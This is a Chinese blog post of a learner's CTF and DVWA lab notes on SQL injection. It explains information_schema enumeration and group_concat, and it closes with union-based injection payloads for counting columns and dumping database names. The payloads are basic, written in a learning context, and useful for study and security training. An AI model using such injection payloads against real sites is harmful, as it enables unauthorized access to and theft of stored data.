1. 第一道sql注入题所学

已于 2024-10-26 17:23:51 修改
阅读量455 收藏
点赞数
文章标签: sql 数据库 mysql
于 2022-10-22 22:56:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tjohn9/article/details/127468997
版权
本文介绍了如何通过SQL注入来查找数据库中的信息,包括利用`information_schema`数据库的`tables`和`columns`表来获取数据库名、表名及字段名。重点讲解了`group_concat`函数的使用,以及如何构造查询语句来展示结果。
摘要由CSDN通过智能技术生成

  1. 总体思路:

    其实flag藏在网站的数据库某张表的某个字段中,作为一行记录存在。所以我们要做的事就是,通过sql注入,找到所有的database,找到每个database的每一张table,找到每一张table的每一个字段。

在这里插入图片描述

  1. 自己不熟悉的地方:

    • select … where xxx = ‘’ union select 1,2,3如何让1,2,3体现在界面上 ?即需不需要加 and 1=1 或者 or 1=1。

      答:如果加了or 1=1,那么相当于where 1=1,即把所有数据都查了出来,就不行。可以直接用’闭合或者使用’闭合后,加一个and 1 = 1。其实可以通过试来。

    • information_schema数据库的使用,以及group_concat的理解。

      答:information_schema数据库有两张关键的表,一张是tables表,另一张是columns表。

      (1.1) information_schema.tables表的字段table_schema,代表着所有**数据库(database)**的名称。可以通过select table_schema from information_schema.tables来查看所有数据库名称,效果如图:

      在这里插入图片描述

      但是会有很多重复的。我们可以通过select table_schema from information_schema.tables group by table_schema来查看去重后的数据库名称。效果如下:

    在这里插入图片描述

    (1.2) information_schema.tables表的字段table_name,代表着所有的数据库表(table)。可以通过select table_name from information_schema.tables来查看。然后,数据库表总和某个数据库相对应,所以一般是select table_name, table_schema from information_schema.tables,如图所示:
    在这里插入图片描述

    如果想一行记录看一种数据库,以及它里面的所有表,那么可以用到group_concat,比如:select group_concat(table_name), table_schema from information_schema.tables group by table_schema,其效果如下:

    在这里插入图片描述

    通过使用group_concat和不使用group_concat的对比,可以直观发现group_concat的作用,如下图所示:

    在这里插入图片描述

    当然,information_schema.tables还有许多其他的字段,上面两个是information_schema.tables的主要字段,通过select * from information_schema.tables可以查看

    (2) information_schema.columns表的column_name字段可以查看所有数据库中的所有表的所有字段(column)。字段确定之前,一般要确定字段所在数据库的名称以及表的名称。所以查询的sql语句一般如下:

    select column_name from information_schema.columns where table_schema="whichDatabase" and table_name ="whichTable"

    如果"whichDatabase"为"information_schema"并且"whichTable"为"columns",那么效果如下:

    在这里插入图片描述

  2. 小总结

在这里插入图片描述

2022.11.7 回顾

  • show databases; =
    select table_schema from information_schema.tables;

    select table_schema from information_schema.tables group by table_schema;

  • show tables; =
    select table_name from information_schema.tables where table_schema='dvwa'

  • 如何查看表结构?(得到表字段)
    select column_name from information_schema.columns where table_schema="dvwa" and table_name="users";

    select * from dvwa.users;
    desc users;

  • 查看当前使用的哪个数据库
    select database();

参考链接:

2024.10.26回顾

1、最先测试有几个字段

?id=1 union select 1 -- d
?id=1 union select 1, 2 -- d
?id=1 union select 1, 2, 3 -- d
?id=1 union select 1, 2, 3, 4 -- d
......

2、然后可以这样判断输入关键单词错误没有(可以用navicat辅助):
?id=2 union select 1,2,3,4 from information_schema.tables

?id=2 union select table_schema,table_schema,table_schema,table_schema from information_schema.tables -- d

3、最后用上group_concat进行爆库:
2 union select group_concat(table_schema), group_concat(table_schema), group_concat(table_schema), group_concat(table_schema) from information_schema.tables -- d

Tjohn9
关注
专栏目录
SQL注入攻击与防御 第2版》PDF版本下载.txt
07-17
- 《SQL注入攻击与防御 第2版》 - OWASP SQL Injection Prevention Cheat Sheet - SQL注入相关的技术博客和论坛讨论 以上内容涵盖了SQL注入的基本概念、原理、类型以及防御措施,并结合实际案例进行了深入分析。...
SQL注入的相关例(ctfhub)
2401_82388450的博客
04-01 1007
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 6873
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
sqli-labs漏洞靶场~SQL注入(全网最全详解)
最新发布
weixin_67832625的博客
08-11 1981
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
SQL注入(一)
彩色代码的博客
05-18 253
SQL注入SQL Injection)是一种常见的安全漏洞,它允许攻击者通过将恶意的SQL代码插入到应用程序的输入字段中,从而执行非授权的数据库操作。这些只是SQL注入的一些常见示例,实际情况可能更为复杂。为了防止SQL注入攻击,应使用参数化查询或预编译语句,使用安全的API和框架,并对用户输入进行充分验证和转义。
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(2),2024年最新阿里P7大牛整理
2401_84302761的博客
05-12 1044
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
sql注入相关题目
wangzhemvp的博客
03-31 462
2.输入 -1 union select databases--+ 没反应,可能存在过滤。information_schema.tables 或 .columns 用反引号。4.从数据库中查看文件内容,mysql提供了读取本地文件的函数load_file()在Switch中,case 里如果没有 break,则会继续向下执行 case。handler `表名` open as `a`;show columns from `表名`;(3)只要用户名密码正确,即可得到flag。联合注入与叠加注入区别。
泛微OA8前台sql注入1
08-08
1. 使用预编译的SQL语句(如Java的PreparedStatement),并绑定参数,避免SQL注入。 2. 对用户输入进行严格验证和过滤,只允许预期的字符和格式。 3. 限制应用程序对数据库的权限,避免使用具有广泛权限的数据库连接...
SQL注入攻击与防御(第2版).part1
06-26
SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,《安全技术经典译丛:SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入。  《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009...
攻击方式学习之SQL注入(SQL Injection)第1/3页
10-30
在当前的IT领域中,SQL注入是一项非常重要的知识,尤其对于网络安全和数据库管理的从业者来说,了解和掌握SQL注入的相关知识是必须的。 首先,SQL注入SQL Injection)是一种常见的攻击技术,攻击者通过在应用程序...
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序处理用户输入时的不安全性,来执行非授权的操作,获取敏感信息或者破坏数据库。360主机卫士是一款针对服务器的安全防护软件,其中包含了SQL...
网络安全面试-SQL注入总结
m0_60571990的博客
03-25 1648
网络安全面试-SQL注入总结
sql注入(基础)
agoodboy6的博客
11-04 297
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此对回显长度有限制。table-name与table-name呼应。
sql注入,基础练习1-4关卡
haozhe6666的博客
07-20 409
程序员为了防止sql注入,对用户输入中的单引号(')进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引 号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号闭合的作用,仅仅成为‘内容’;相信大家一定能发现它们之间的微小的区别,这也是数字型和字符型上的一个重要的区别,接下来的注入过程,我们只需要去想方设法的闭合掉 '$id' 前面的'和后面的语句及符号就ok了,然后后面的就是进行正常的一个注入过程了。要进行注入,得先知道是否能进行注入。
cisp-pte基础题目SQL注入
weixin_53313406的博客
11-25 3098
cisp-pte基础题目SQL注入(超详细)
SQL注入--题目
lulu001128的博客
07-26 464
过程
cisp-pte之SQL注入
m0_58544284的博客
06-13 604
通过审得知题目要求通过SQL注入漏洞读取网站/home/key文件,首先想到SQL语句“load_file()”通过提示发现#、–、空格等均被过滤,符号尝试url编码绕过,空格通过/**/可绕过。hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场。审时的事key在/home下,直接带入sql语句查询即可。重点在于过滤了union,使用双写即可绕过。点击进入答,尝试get请求参数id=1。group by 4正常回显。group by 5回显报错。由此确认当前表的字段数为4。
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 2039
做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
SQL注入以及一些web
2401_82388450的博客
04-03 859
1.进入页面,发现输入非零会有回显,输入零和字母就没有回显 2.此使用堆叠注入,输入1;show databases;显示所有的库3.输入1;show tables;查所有的表4.输入1;show columns from Flag查flag表的字段,发现报错5.猜测过滤了一些内容,这里有两种方法构建payload:1.判断列数2.判断显错位3.爆数据库4.爆表名5.爆字段名6.爆数据,发现只有一半,想到使用substring()函数7. 发现substring()函数被过滤,使用mid函数,爆出后一半f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值